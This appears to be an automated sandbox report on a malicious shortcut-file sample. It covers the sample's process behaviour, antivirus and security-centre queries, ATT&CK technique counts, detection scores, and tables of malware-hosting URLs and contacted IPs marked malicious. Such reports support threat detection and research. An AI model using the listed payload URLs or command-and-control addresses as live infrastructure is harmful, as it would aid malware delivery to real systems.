Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Code function: GetModuleHandleA,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleHandleA,EnumResourceLanguagesA,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleFileNameA,GetLocaleInfoA,_errno,_errno,_snwprintf_s,_errno,_errno,_errno,LoadLibraryA,6_2_0000000180017974
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoA,6_2_000000018002B35C
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018002596C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_000000018002596C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000BE00 GetVersionExA,6_2_000000018000BE00

                  Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 0000000D.00000002.518221272.00000261ADA13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.518385359.00000261ADB02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                  Stealing of Sensitive Information

Source: Yara match File source: 8.2.regsvr32.exe.2c90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2c90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.1380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.296695809.00000000013B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.296664424.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.518667146.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix (a count before a technique name is the number of matching signatures; techniques without a count are the unmatched matrix entries)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 Input Capture | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 12 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 2 Native API | Boot or Logon Initialization Scripts | 111 Process Injection | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 35 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | 3 PowerShell | Logon Script (Mac) | Logon Script (Mac) | 31 Masquerading | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 31 Virtualization/Sandbox Evasion | LSA Secrets | 41 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | 122 Application Layer Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 111 Process Injection | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Hidden Files and Directories | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 11 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph ID: 615497, Sample: 2022-04-26_1045.exe.lnk, Startdate: 26/04/2022, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label
2022-04-26_1045.exe.lnk | 32% | Virustotal |
2022-04-26_1045.exe.lnk | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\GMOWDTRfIJ.xtq | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
8.2.regsvr32.exe.2c90000.0.unpack | 100% | Avira | HEUR/AGEN.1215493
6.2.regsvr32.exe.1380000.0.unpack | 100% | Avira | HEUR/AGEN.1215493

Source | Detection | Scanner | Label
focusmedica.in | 13% | Virustotal |

Source | Detection | Scanner | Label
http://focusmedica.in/fmlib/IxB | 100% | Avira URL Cloud | malware
https://138.201.142.73/q | 0% | Avira URL Cloud | safe
https://contoso.com/License | 0% | URL Reputation | safe
http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/ | 100% | Avira URL Cloud | malware
https://creemo.pl/wp-admin/Z | 0% | Avira URL Cloud | safe
http://filmmogzivota.rs/SpryAssets/gDR/ | 100% | Avira URL Cloud | malware
https://contoso.com/ | 0% | URL Reputation | safe
https://www.pango.co/privacy | 0% | URL Reputation | safe
http://colegiounamuno.es/cgi-bin/E/ | 100% | Avira URL Cloud | malware
http://focusmedica.in/ | 100% | Avira URL Cloud | malware
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
https://138.201.142.73/% | 0% | Avira URL Cloud | safe
https://creemo.pl/wp-admin/ZKS1DcdquUT4Bb8Kb/ | 100% | Avira URL Cloud | malware
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
http://focusmedica.in | 100% | Avira URL Cloud | malware
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
http://cipro.mx/prensa/siZP69rBFmibDvuTP1L/ | 100% | Avira URL Cloud | malware
https://dynamic.t | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://demo34.ckg.hk/service/hhMZrfC7Mnm9JD/ | 100% | Avira URL Cloud | malware
http://focusmedica.inx | 0% | Avira URL Cloud | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
focusmedica.in | 166.62.28.147 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/ | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://focusmedica.in/fmlib/IxB | powershell.exe, 00000000.00000002.313413338.000002C321929000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://138.201.142.73/q | regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323148198.0000018977C47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327924238.0000018977C4D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327141707.0000018977C42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323195530.0000018977C41000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://creemo.pl/wp-admin/Z | powershell.exe, 00000000.00000002.313413338.000002C321929000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 0000000B.00000003.322793678.0000018977C5E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://filmmogzivota.rs/SpryAssets/gDR/ | powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.dr | true | Avira URL Cloud: malware | unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327141707.0000018977C42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323195530.0000018977C41000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.314787403.000002C330D50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.hotspotshield.com/terms/ | svchost.exe, 00000014.00000003.415993426.00000278A45AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415934136.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.417296426.00000278A4588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415967701.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.416039104.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.pango.co/privacy | svchost.exe, 00000014.00000003.415993426.00000278A45AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415934136.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.417296426.00000278A4588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415967701.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.416039104.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://colegiounamuno.es/cgi-bin/E/ | powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.dr | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.309161023.000002C320CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.296032360.000002A116C21000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.bingmapsportal.com | svchost.exe, 0000000B.00000002.325666258.0000018977C13000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://focusmedica.in/ | powershell.exe, 00000002.00000002.301252528.000002A117843000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.314787403.000002C330D50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://138.201.142.73/% | regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://creemo.pl/wp-admin/ZKS1DcdquUT4Bb8Kb/ | powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.dr | true | Avira URL Cloud: malware | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323180966.0000018977C45000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000002.00000002.301712766.000002A117962000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | svchost.exe, 0000000B.00000003.322760702.0000018977C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.328487102.0000018977C6A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmp | false
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323180966.0000018977C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crl.ver)svchost.exe, 00000011.00000002.519238319.000001ED94287000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.446199582.00000278A3CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000014.00000003.426094048.00000278A459B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.426121984.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.427531416.00000278A4588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://focusmedica.inpowershell.exe, 00000002.00000002.301171990.000002A117825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.301217804.000002A11783A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000002.325666258.0000018977C13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://%s.xboxlive.comsvchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      low
                                                                      https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://support.hotspotshield.com/svchost.exe, 00000014.00000003.415993426.00000278A45AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415934136.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.417296426.00000278A4588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415967701.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.416039104.00000278A4A02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://cipro.mx/prensa/siZP69rBFmibDvuTP1L/powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drtrue
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://dynamic.tsvchost.exe, 0000000B.00000003.323180966.0000018977C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://disneyplus.com/legal.svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.326048817.0000018977C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://demo34.ckg.hk/service/hhMZrfC7Mnm9JD/powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drtrue
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://activity.windows.comsvchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://focusmedica.inxpowershell.exe, 00000002.00000002.301171990.000002A117825000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://help.disneyplus.com.svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://%s.dnet.xboxlive.comsvchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              low
                                                                                              https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000003.322793678.0000018977C5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
[Map figure: contacted IPs by country. Legend buckets: No. of IPs < 25% / 25% < No. of IPs < 50% / 50% < No. of IPs < 75% / 75% < No. of IPs]
IP | Domain | Country | ASN | ASN Name | Malicious
166.62.28.147 | focusmedica.in | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
151.106.112.196 | unknown | Germany | 61157 | PLUSSERVER-ASN1DE | true
110.232.117.186 | unknown | Australia | 56038 | RACKCORP-APRackCorpAU | true
51.254.140.238 | unknown | France | 16276 | OVHFR | true
103.132.242.26 | unknown | India | 45117 | INPL-IN-APIshansNetworkIN | true
187.84.80.182 | unknown | Brazil | 52850 | OxentenetSolucoesTecnologicasEireliBR | true
45.118.115.99 | unknown | Indonesia | 131717 | IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID | true
134.195.212.50 | unknown | Reserved | 289 | DNIC-AS-00289US | true
172.104.251.154 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
209.126.98.206 | unknown | United States | 30083 | AS-30083-GO-DADDY-COM-LLCUS | true
1.234.21.73 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
206.189.28.199 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
167.99.115.35 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
185.8.212.130 | unknown | Uzbekistan | 48979 | UZINFOCOMUZ | true
185.4.135.165 | unknown | Greece | 199246 | TOPHOSTGR | true
197.242.150.244 | unknown | South Africa | 37611 | AfrihostZA | true
45.176.232.124 | unknown | Colombia | 267869 | CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCO | true
183.111.227.137 | unknown | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | true
51.91.76.89 | unknown | France | 16276 | OVHFR | true
50.30.40.196 | unknown | United States | 30083 | AS-30083-GO-DADDY-COM-LLCUS | true
164.68.99.3 | unknown | Germany | 51167 | CONTABODE | true
167.172.253.162 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
189.126.111.200 | unknown | Brazil | 27715 | LocawebServicosdeInternetSABR | true
146.59.226.45 | unknown | Norway | 16276 | OVHFR | true
58.227.42.236 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
196.218.30.83 | unknown | Egypt | 8452 | TE-ASTE-ASEG | true
158.69.222.101 | unknown | Canada | 16276 | OVHFR | true
159.65.88.10 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
101.50.0.91 | unknown | Indonesia | 55688 | BEON-AS-IDPTBeonIntermediaID | true
185.157.82.211 | unknown | Poland | 42927 | S-NET-ASPL | true
103.43.46.182 | unknown | Indonesia | 58397 | INFINYS-AS-IDPTInfinysSystemIndonesiaID | true
104.168.154.79 | unknown | United States | 54290 | HOSTWINDSUS | true
212.237.17.99 | unknown | Italy | 31034 | ARUBA-ASNIT | true
212.24.98.99 | unknown | Lithuania | 62282 | RACKRAYUABRakrejusLT | true
201.94.166.162 | unknown | Brazil | 28573 | CLAROSABR | true
160.16.142.56 | unknown | Japan | 9370 | SAKURA-BSAKURAInternetIncJP | true
103.75.201.2 | unknown | Thailand | 133496 | CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH | true
